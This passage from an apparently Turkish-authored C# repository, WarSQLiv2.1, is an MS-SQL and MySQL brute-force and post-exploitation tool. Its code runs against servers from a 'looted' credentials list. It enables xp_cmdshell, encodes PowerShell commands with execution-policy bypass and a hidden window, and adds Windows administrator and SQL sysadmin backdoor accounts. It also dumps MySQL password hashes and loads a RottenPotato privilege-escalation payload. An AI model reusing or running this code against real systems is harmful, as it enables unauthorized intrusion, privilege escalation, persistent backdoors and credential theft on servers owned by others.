79 | if (!string.IsNullOrEmpty(LootedServer))
80 | {
81 | var parcala = LootedServer.Split(':');
82 | var server = parcala[0];
83 | var user = parcala[2];
84 | var pass = parcala[3];
85 | var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
86 | try
87 | {
88 | var conn = new SqlConnection(conS);
89 | var cmd = new SqlCommand(openXpCmdShell, conn);
90 | conn.Open();
91 | var rdr = cmd.ExecuteReader();
92 | while (rdr.Read())
93 | {
94 | Result += $"{Environment.NewLine}{rdr[0]}";
95 | }
96 | rdr.Close();
97 | conn.Close();
98 |
99 | Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("XPCmdShell1")}";
100 | cmdControl.isExecuted = true;
101 | cmdControl.isActivated = true;
102 | }
103 | catch (SqlException exp)
104 | {
105 | if(exp.ErrorCode == -2146232060)
106 | {
107 | cmdControl.isExecuted = false;
108 | Result += Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell4");
109 | }
110 | else
111 | {
112 | CmdException += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
113 | }
114 | }
115 | }
116 | else
117 | {
118 | Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
119 | }
120 | }));
121 |
122 | }
123 | }
124 | }
125 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/PostExploitation/EncodeBase64.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace WarSQLiv2.Exploitation.PostExploitation
8 | {
9 | class EncodeBase64
10 | {
11 | public static string ConvertTextToBase64(string clearText)
12 | {
13 | byte[] asc = Encoding.ASCII.GetBytes(clearText);
14 | string unic = Encoding.ASCII.GetString(asc);
15 | var plainTextBytes = System.Text.Encoding.Unicode.GetBytes(unic);
16 | var base64 = "powershell -Enc " + Convert.ToBase64String(plainTextBytes) + " -noprofile -ExecutionPolicy Bypass -window hidden";
17 |
18 | return base64;
19 | }
20 | public static string ConvertTextToBase64NonBypass(string clearText)
21 | {
22 | byte[] asc = Encoding.ASCII.GetBytes(clearText);
23 | string unic = Encoding.ASCII.GetString(asc);
24 | var plainTextBytes = System.Text.Encoding.Unicode.GetBytes(unic);
25 | var base64 = "powershell -Enc " + Convert.ToBase64String(plainTextBytes);
26 |
27 | return base64;
28 | }
29 | public static string ConvertTextToBase64NonPs(string clearText)
30 | {
31 | byte[] asc = Encoding.ASCII.GetBytes(clearText);
32 | string unic = Encoding.ASCII.GetString(asc);
33 | var plainTextBytes = System.Text.Encoding.Unicode.GetBytes(unic);
34 | var base64 = Convert.ToBase64String(plainTextBytes);
35 |
36 | return base64;
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/PostExploitation/MySqlPostExploitation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data.SqlClient;
4 | using MySql.Data.MySqlClient;
5 | using WarSQLiv2.Exploitation.Control;
6 |
7 | namespace WarSQLiv2.Exploitation.PostExploitation
8 | {
9 | class MySqlPostExploitation
10 | {
11 | private string _exception;
12 | private string _exploitResult;
13 | private string _exploitCode;
14 | ///
15 | /// Fırlatılan Exception'ı yakalayıp kullanıcıya göstermek için kullanılacak
16 | ///
17 | public string Exception
18 | {
19 | get { return _exception; }
20 | set
21 | {
22 | _exception = string.Empty;
23 | _exception = value;
24 | }
25 | }
26 |
27 | public string ExploitCode { get; set; }
28 | public string ExploitResult
29 | {
30 | get { return _exploitResult; }
31 | }
32 |
33 | ///
34 | /// Seçilen Listbox item'ını SelectedItem değerine mutlaka set etmemiz gerekir. Bu değer lstLooted'ın selectedItems'ının değeri olmalıdır.
35 | ///
36 | public string SelectedItem { get; set; }
37 |
38 | public List LootedList { get; set; }
39 | public void ExploitMySql()
40 | {
41 | LootedControl();
42 | var changeLang = new LanguageControl();
43 | changeLang.FindLang();
44 | if (!string.IsNullOrEmpty(SelectedItem))
45 | {
46 | var split = SelectedItem.Split(':');
47 | var server = split[0];
48 | var user = split[2];
49 | var pass = split[3];
50 | var con = new MySqlConnectionStringBuilder() { Server = server, UserID = user, Password = pass };
51 | var mysqlConn = new MySqlConnection(con.ToString());
52 | try
53 | {
54 | var cmd = new MySqlCommand(ExploitCode, mysqlConn);
55 | mysqlConn.Open();
56 | var rdr = cmd.ExecuteReader();
57 | _exploitResult = string.Empty;
58 | while (rdr.Read())
59 | {
60 | _exploitResult += $"{Environment.NewLine}{rdr[1]}";
61 | }
62 | rdr.Close();
63 | mysqlConn.Close();
64 | }
65 | catch (SqlException exp)
66 | {
67 | Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
68 | }
69 | }
70 | else
71 | {
72 | Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
73 | }
74 | }
75 | public void MySqlHashDump()
76 | {
77 | LootedControl();
78 | var changeLang = new LanguageControl();
79 | changeLang.FindLang();
80 | if (!string.IsNullOrEmpty(SelectedItem))
81 | {
82 | var split = SelectedItem.Split(':');
83 | var server = split[0];
84 | var user = split[2];
85 | var pass = split[3];
86 | var con = new MySqlConnectionStringBuilder() { Server = server, UserID = user, Password = pass };
87 | var mysqlConn = new MySqlConnection(con.ToString());
88 | try
89 | {
90 | var cmd = new MySqlCommand(ExploitCode, mysqlConn);
91 | mysqlConn.Open();
92 | var rdr = cmd.ExecuteReader();
93 | _exploitResult = string.Empty;
94 | while (rdr.Read())
95 | {
96 | _exploitResult += $"{Environment.NewLine}{rdr[1]}:{rdr[2]}";
97 | }
98 | rdr.Close();
99 | mysqlConn.Close();
100 | }
101 | catch (SqlException exp)
102 | {
103 | Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
104 | }
105 | }
106 | else
107 | {
108 | Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
109 | }
110 | }
111 | private void LootedControl()
112 | {
113 | var lootedFileControl = new LootedFileControl();
114 | try
115 | {
116 | lootedFileControl.FileControl();
117 | var lootedList = lootedFileControl.LootedList;
118 | foreach (var t in lootedList)
119 | {
120 | LootedList.Add(t);
121 | }
122 | }
123 | catch (Exception exp)
124 | {
125 | Exception = lootedFileControl.Exception;
126 | }
127 | }
128 | public void GeneralExploiting()
129 | {
130 | LootedControl();
131 | var changeLang = new LanguageControl();
132 | changeLang.FindLang();
133 | if (!string.IsNullOrEmpty(SelectedItem))
134 | {
135 | var split = SelectedItem.Split(':');
136 | var server = split[0];
137 | var user = split[2];
138 | var pass = split[3];
139 | var con = new MySqlConnectionStringBuilder() { Server = server, UserID = user, Password = pass };
140 | var mysqlConn = new MySqlConnection(con.ToString());
141 | try
142 | {
143 | var cmd = new MySqlCommand(ExploitCode, mysqlConn);
144 | mysqlConn.Open();
145 | var rdr = cmd.ExecuteReader();
146 | _exploitResult = string.Empty;
147 | while (rdr.Read())
148 | {
149 | _exploitResult += $"{Environment.NewLine}{rdr[0]}";
150 | }
151 | rdr.Close();
152 | mysqlConn.Close();
153 | }
154 | catch (SqlException exp)
155 | {
156 | Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
157 | }
158 | }
159 | else
160 | {
161 | Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
162 | }
163 | }
164 | }
165 | }
166 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/PostExploitation/RottenPotato.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace WarSQLiv2.Exploitation.PostExploitation
9 | {
10 | class RottenPotato
11 | {
12 | public static string PotatoBytes()
13 | {
14 | var potato = "0x" + File.ReadAllText(@"C:\Users\sKyWiPer\Documents\Visual Studio 2015\Projects\WarSQLiv2\WarSQLiv2\bin\Debug\Scanner\Exploit\RottenPotato\Potato.txt");
15 | return potato;
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/WarSQLiv2/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Resources;
3 | using System.Runtime.CompilerServices;
4 | using System.Runtime.InteropServices;
5 | using System.Windows;
6 |
7 | // General Information about an assembly is controlled through the following
8 | // set of attributes. Change these attribute values to modify the information
9 | // associated with an assembly.
10 | [assembly: AssemblyTitle("WarSQLiv2.1")]
11 | [assembly: AssemblyDescription("MS-SQL BruteForce and Post Exploitation Tools")]
12 | [assembly: AssemblyConfiguration("")]
13 | [assembly: AssemblyCompany("eyupcelik.com.tr")]
14 | [assembly: AssemblyProduct("WarSQLiv2.1")]
15 | [assembly: AssemblyCopyright("Copyright © 2015 Eyup CELIK")]
16 | [assembly: AssemblyTrademark("")]
17 | [assembly: AssemblyCulture("")]
18 |
19 | // Setting ComVisible to false makes the types in this assembly not visible
20 | // to COM components. If you need to access a type in this assembly from
21 | // COM, set the ComVisible attribute to true on that type.
22 | [assembly: ComVisible(false)]
23 |
24 | //In order to begin building localizable applications, set
25 | //CultureYouAreCodingWith in your .csproj file
26 | //inside a . For example, if you are using US english
27 | //in your source files, set the to en-US. Then uncomment
28 | //the NeutralResourceLanguage attribute below. Update the "en-US" in
29 | //the line below to match the UICulture setting in the project file.
30 |
31 | //[assembly: NeutralResourcesLanguage("en-US", UltimateResourceFallbackLocation.Satellite)]
32 |
33 |
34 | [assembly: ThemeInfo(
35 | ResourceDictionaryLocation.None, //where theme specific resource dictionaries are located
36 | //(used if a resource is not found in the page,
37 | // or application resource dictionaries)
38 | ResourceDictionaryLocation.SourceAssembly //where the generic resource dictionary is located
39 | //(used if a resource is not found in the page,
40 | // app, or any theme specific resource dictionaries)
41 | )]
42 |
43 |
44 | // Version information for an assembly consists of the following four values:
45 | //
46 | // Major Version
47 | // Minor Version
48 | // Build Number
49 | // Revision
50 | //
51 | // You can specify all the values or you can default the Build and Revision Numbers
52 | // by using the '*' as shown below:
53 | // [assembly: AssemblyVersion("1.0.*")]
54 | [assembly: AssemblyVersion("2.1.0.0")]
55 | [assembly: AssemblyFileVersion("2.1.0.0")]
56 |
--------------------------------------------------------------------------------
/WarSQLiv2/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace WarSQLiv2.Properties
12 | {
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources
26 | {
27 |
28 | private static global::System.Resources.ResourceManager resourceMan;
29 |
30 | private static global::System.Globalization.CultureInfo resourceCulture;
31 |
32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
33 | internal Resources()
34 | {
35 | }
36 |
37 | ///
38 | /// Returns the cached ResourceManager instance used by this class.
39 | ///
40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
41 | internal static global::System.Resources.ResourceManager ResourceManager
42 | {
43 | get
44 | {
45 | if ((resourceMan == null))
46 | {
47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("WarSQLiv2.Properties.Resources", typeof(Resources).Assembly);
48 | resourceMan = temp;
49 | }
50 | return resourceMan;
51 | }
52 | }
53 |
54 | ///
55 | /// Overrides the current thread's CurrentUICulture property for all
56 | /// resource lookups using this strongly typed resource class.
57 | ///
58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
59 | internal static global::System.Globalization.CultureInfo Culture
60 | {
61 | get
62 | {
63 | return resourceCulture;
64 | }
65 | set
66 | {
67 | resourceCulture = value;
68 | }
69 | }
70 | }
71 | }
72 |
--------------------------------------------------------------------------------
/WarSQLiv2/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/WarSQLiv2/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace WarSQLiv2.Properties
12 | {
13 |
14 |
15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
18 | {
19 |
20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
21 |
22 | public static Settings Default
23 | {
24 | get
25 | {
26 | return defaultInstance;
27 | }
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/WarSQLiv2/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/WarSQLiv2/Startup.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAddMsSqlUser.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAddMsSqlUser.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Shapes;
14 | using System.Windows.Threading;
15 | using WarSQLiv2.Exploitation.Control;
16 | using WarSQLiv2.Exploitation.PostExploitation;
17 |
18 | namespace WarSQLiv2.UserControls.Attack.MSSQL
19 | {
20 | ///
21 | /// Interaction logic for FrmAddMsSqlUser.xaml
22 | ///
23 | public partial class FrmAddMsSqlUser : Window
24 | {
25 | private readonly LanguageControl _languageControl = new LanguageControl();
26 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
27 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
28 | private int _selectedId = 0;
29 | public FrmAddMsSqlUser()
30 | {
31 | InitializeComponent();
32 | }
33 | private void Window_Loaded(object sender, RoutedEventArgs e)
34 | {
35 | _languageControl.FindLang();
36 | var lootedFileControl = new LootedFileControl();
37 | try
38 | {
39 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
40 | {
41 | btnSave.Content = _languageControl.SelectedLanguage.GetString("ButtonSave");
42 | Title = _languageControl.SelectedLanguage.GetString("TitleMSSQLUser");
43 | lootedFileControl.FileControl();
44 | var lootedList = lootedFileControl.LootedList;
45 | foreach (var t in lootedList)
46 | {
47 | lstLooted.Items.Add(t);
48 | }
49 |
50 | lstLooted.SelectedIndex = 0;
51 | var toolStripControl = new ToolStripInformation
52 | {
53 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
54 | Command = "sp_server_info",
55 | };
56 | toolStripControl.SqlServerInformation();
57 | lblStrip.Content = string.Empty;
58 | lblStrip.Content = toolStripControl.SqlServerInfo;
59 | });
60 |
61 | }
62 | catch (Exception exp)
63 | {
64 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
65 | {
66 | txtStatus.AppendText(lootedFileControl.Exception);
67 | });
68 | }
69 | }
70 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
71 | {
72 | try
73 | {
74 | Dispatcher.Invoke((Action)delegate
75 | {
76 | _selectedId = 0;
77 | _selectedId = lstLooted.SelectedIndex;
78 | lblStrip.Content = string.Empty;
79 | var toolStripControl = new ToolStripInformation
80 | {
81 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
82 | Command = "sp_server_info",
83 | };
84 | toolStripControl.SqlServerInformation();
85 | lblStrip.Content = toolStripControl.SqlServerInfo;
86 | });
87 |
88 | }
89 | catch (Exception exp)
90 | {
91 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
92 | {
93 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
94 | });
95 | }
96 | }
97 | private void btnSave_Click(object sender, RoutedEventArgs e)
98 | {
99 | var isActivated = cmdControl.isActivated;
100 | var isExecuted = cmdControl.isExecuted;
101 | if (isActivated == false && isExecuted == false)
102 | {
103 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
104 | try
105 | {
106 | Dispatcher.Invoke((Action)delegate
107 | {
108 | enableXpCmdShell.XpCmdShellStatus();
109 | txtStatus.AppendText(enableXpCmdShell.Result);
110 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
111 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
112 | if (contains == true)
113 | {
114 | isActivated = true;
115 | isExecuted = true;
116 | }
117 | });
118 | }
119 | catch (Exception)
120 | {
121 | Dispatcher.Invoke((Action)delegate
122 | {
123 | txtStatus.AppendText(enableXpCmdShell.CmdException);
124 | });
125 | }
126 | }
127 |
128 | if (isExecuted == true && isActivated == true)
129 | {
130 | try
131 | {
132 | Dispatcher.Invoke((Action)delegate
133 | {
134 | var addUserCode = "";
135 | addUserCode += "USE [master]\r\n";
136 | addUserCode += "CREATE LOGIN " + txtUserName.Text + "\r\n";
137 | addUserCode += "WITH PASSWORD = N'" + txtPassword.Text + "',\r\n";
138 | addUserCode += "CHECK_POLICY = OFF,\r\n";
139 | addUserCode += "CHECK_EXPIRATION = OFF;\r\n";
140 | addUserCode += "EXEC sp_addsrvrolemember \r\n";
141 | addUserCode += "@loginame = N'" + txtUserName.Text + "',\r\n";
142 | addUserCode += "@rolename = N'sysadmin';\r\n";
143 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
144 | _postExploitation.ExploitCode = addUserCode;
145 | _postExploitation.RunExploit();
146 | if(!string.IsNullOrEmpty(_postExploitation.ExploitResult))
147 | {
148 | txtStatus.AppendText(_postExploitation.ExploitResult);
149 | }
150 | else
151 | {
152 | txtStatus.AppendText(_postExploitation.Exception);
153 | }
154 | });
155 | }
156 | catch (Exception exp)
157 | {
158 | Dispatcher.Invoke((Action)delegate
159 | {
160 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
161 | });
162 | }
163 |
164 | try
165 | {
166 | Dispatcher.Invoke((Action)delegate
167 | {
168 | var exploitCode = "select name from master.sys.sql_logins";
169 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
170 | _postExploitation.ExploitCode = exploitCode;
171 | _postExploitation.RunExploit();
172 | var isAdd = _postExploitation.ExploitResult.Contains(txtUserName.Text);
173 | if (isAdd == true)
174 | {
175 | txtStatus.AppendText(Environment.NewLine + txtUserName.Text + _languageControl.SelectedLanguage.GetString("MessageExploitMysqlAddUser1"));
176 | }
177 | else
178 | {
179 | txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageExploitMssqlAddUser1"));
180 | }
181 | });
182 | }
183 | catch (Exception exp)
184 | {
185 | Dispatcher.Invoke((Action)delegate
186 | {
187 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
188 | });
189 | }
190 | }
191 |
192 | }
193 | }
194 | }
195 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAddWindowsUser.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAddWindowsUser.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Shapes;
14 | using System.Windows.Threading;
15 | using WarSQLiv2.Exploitation.Control;
16 | using WarSQLiv2.Exploitation.PostExploitation;
17 |
18 | namespace WarSQLiv2.UserControls.Attack.MSSQL
19 | {
20 | ///
21 | /// Interaction logic for FrmAddWindowsUser.xaml
22 | ///
23 | public partial class FrmAddWindowsUser : Window
24 | {
25 | private readonly LanguageControl _languageControl = new LanguageControl();
26 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
27 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
28 | private int _selectedId = 0;
29 | public FrmAddWindowsUser()
30 | {
31 | InitializeComponent();
32 | }
33 | private void Window_Loaded(object sender, RoutedEventArgs e)
34 | {
35 | _languageControl.FindLang();
36 | var lootedFileControl = new LootedFileControl();
37 | try
38 | {
39 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
40 | {
41 | btnSave.Content = _languageControl.SelectedLanguage.GetString("ButtonSave");
42 | Title = _languageControl.SelectedLanguage.GetString("TitleWindowsUserAdd");
43 | lootedFileControl.FileControl();
44 | var lootedList = lootedFileControl.LootedList;
45 | foreach (var t in lootedList)
46 | {
47 | lstLooted.Items.Add(t);
48 | }
49 |
50 | lstLooted.SelectedIndex = 0;
51 | var toolStripControl = new ToolStripInformation
52 | {
53 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
54 | Command = "sp_server_info",
55 | };
56 | toolStripControl.SqlServerInformation();
57 | lblStrip.Content = string.Empty;
58 | lblStrip.Content = toolStripControl.SqlServerInfo;
59 | });
60 |
61 | }
62 | catch (Exception exp)
63 | {
64 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
65 | {
66 | txtStatus.AppendText(lootedFileControl.Exception);
67 | });
68 | }
69 | }
70 | private void btnSave_Click(object sender, RoutedEventArgs e)
71 | {
72 | var isActivated = cmdControl.isActivated;
73 | var isExecuted = cmdControl.isExecuted;
74 | if (isActivated == false && isExecuted == false)
75 | {
76 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
77 | try
78 | {
79 | Dispatcher.Invoke((Action)delegate
80 | {
81 | enableXpCmdShell.XpCmdShellStatus();
82 | txtStatus.AppendText(enableXpCmdShell.Result);
83 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
84 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
85 | if (contains == true)
86 | {
87 | isActivated = true;
88 | isExecuted = true;
89 | }
90 | });
91 | }
92 | catch (Exception)
93 | {
94 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
95 | {
96 | txtStatus.AppendText(enableXpCmdShell.CmdException);
97 | });
98 | }
99 | }
100 | if (isExecuted == true && isActivated == true)
101 | {
102 | try
103 | {
104 | Dispatcher.Invoke((Action)delegate
105 | {
106 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
107 | _postExploitation.SqlCommand = "net user " + txtUserName.Text + " " + txtPassword.Text + " /add";
108 | _postExploitation.VolumeList = new List();
109 | _postExploitation.VolumeList.Clear();
110 | _postExploitation.SqlExploitation();
111 | txtStatus.AppendText(_postExploitation.ExploitResult);
112 | for (var i = 0; i < _postExploitation.VolumeList.Count; i++)
113 | {
114 | txtStatus.AppendText(_postExploitation.VolumeList[i].Replace(" ", "").Replace(" ", "").Replace(" ", "").Replace(" ", ""));
115 | }
116 | });
117 | }
118 | catch (Exception exp)
119 | {
120 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
121 | {
122 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
123 | });
124 | }
125 | try
126 | {
127 | Dispatcher.Invoke((Action)delegate
128 | {
129 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
130 | _postExploitation.SqlCommand = string.Empty;
131 | _postExploitation.SqlCommand += "net localgroup administrators " + txtUserName.Text + " /add";
132 | _postExploitation.VolumeList = new List();
133 | _postExploitation.VolumeList.Clear();
134 | _postExploitation.SqlExploitation();
135 | txtStatus.AppendText(_postExploitation.ExploitResult);
136 | for (var i = 0; i < _postExploitation.VolumeList.Count; i++)
137 | {
138 | txtStatus.AppendText(_postExploitation.VolumeList[i].Replace("\r", "").Replace("\n", ""));
139 | }
140 | });
141 | }
142 | catch (Exception exp)
143 | {
144 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
145 | {
146 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
147 | });
148 | }
149 | }
150 |
151 | }
152 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
153 | {
154 | try
155 | {
156 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
157 | {
158 | _selectedId = 0;
159 | _selectedId = lstLooted.SelectedIndex;
160 | lblStrip.Content = string.Empty;
161 | var toolStripControl = new ToolStripInformation
162 | {
163 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
164 | Command = "sp_server_info",
165 | };
166 | toolStripControl.SqlServerInformation();
167 | lblStrip.Content = toolStripControl.SqlServerInfo;
168 | });
169 |
170 | }
171 | catch (Exception exp)
172 | {
173 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
174 | {
175 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
176 | });
177 |
178 | }
179 | }
180 | }
181 | }
182 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAllPrograms.xaml:
--------------------------------------------------------------------------------
1 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAllPrograms.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Windows;
3 | using System.Windows.Controls;
4 | using System.Windows.Threading;
5 | using WarSQLiv2.Exploitation.Control;
6 | using WarSQLiv2.Exploitation.PostExploitation;
7 |
8 | namespace WarSQLiv2.UserControls.Attack.MSSQL
9 | {
10 | ///
11 | /// Interaction logic for FrmAllPrograms.xaml
12 | ///
13 | public partial class FrmAllPrograms : Window
14 | {
15 | private readonly LanguageControl _languageControl = new LanguageControl();
16 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
